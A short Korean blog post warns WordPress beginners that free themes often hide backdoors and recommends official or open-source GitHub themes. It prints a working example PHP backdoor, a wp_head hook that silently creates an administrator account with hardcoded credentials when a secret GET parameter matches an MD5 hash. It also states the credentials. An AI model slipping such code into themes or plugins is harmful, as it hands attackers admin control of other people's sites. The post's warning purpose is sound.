WordPress를 막 접한 일부 초보자들은 항상 인터넷에서 무료 테마를 찾는 것을 좋아하지만, 이러한 테마에 웹사이트 권한을 쉽게 획득하여 불법적인 이익을 취할 수 있는 백도어가 숨겨져 있을 가능성이 매우 높다는 사실을 알지 못합니다.
따라서 여기서 초보자들에게 한 가지 당부하고자 합니다. 테마를 찾을 때는 반드시 정품을 찾아야 합니다. 무료 버전이라면, 가급적 GitHub에 오픈 소스 프로젝트가 있는 테마를 선택하세요. 이렇게 하면 어느 정도 백도어를 만날 가능성을 줄일 수 있습니다.
예시
아래에 흔히 볼 수 있는 백도어 코드를 소개하겠습니다.
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
if (md5($_GET['backdoor']) == 'b0f455571f6ae6c30e7521e9bf00b4f2') {
require('wp-includes/registration.php');
if (!username_exists('mr_admin')) {
$user_id = wp_create_user('xinyewl', 'me');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
PHP가 이 코드를 실행하여 요청을 처리하기만 하면, 해당 관리 페이지에 비밀번호를 사용해 로그인할 수 있으며, 정상적으로 로그인하면 관리자 권한을 획득할 수 있습니다. 즉, 심지어 셸까지 얻을 수 있다는 뜻입니다. 구체적인 내용은 더 말하지 않겠습니다. 스스로 알아보세요.
여기서 기본으로 설정한 계정과 비밀번호는 다음과 같습니다.
계정: xinyewl
비밀번호: me
구체적으로 어떻게 사용하는지는 말하지 않겠습니다. 초등학생들이 악의적으로 테마에 삽입하는 것을 방지하기 위해서이기도 합니다.
그럼 이만하겠습니다. 절대로 나쁜 일에 사용하지 마세요.
